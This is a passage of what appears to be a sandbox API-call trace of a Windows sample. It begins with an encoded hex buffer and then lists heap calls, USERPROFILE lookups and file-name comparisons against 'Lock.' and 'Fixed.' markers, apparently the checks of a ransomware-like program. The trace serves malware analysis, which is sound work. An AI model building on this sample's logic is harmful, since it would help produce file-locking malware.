d69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.943] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0258.943] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.943] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S8aFA8f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8aFA8f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aFA8f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FA8f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A8f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0258.945] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0258.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S8aFA8f.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8aFA8f.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aFA8f.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FA8f.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A8f.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8f.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0258.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.947] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.947] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0258.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.948] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.948] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0258.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0258.951] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.951] RtlAllocateHeap (HeapHandle=0x25c0000, 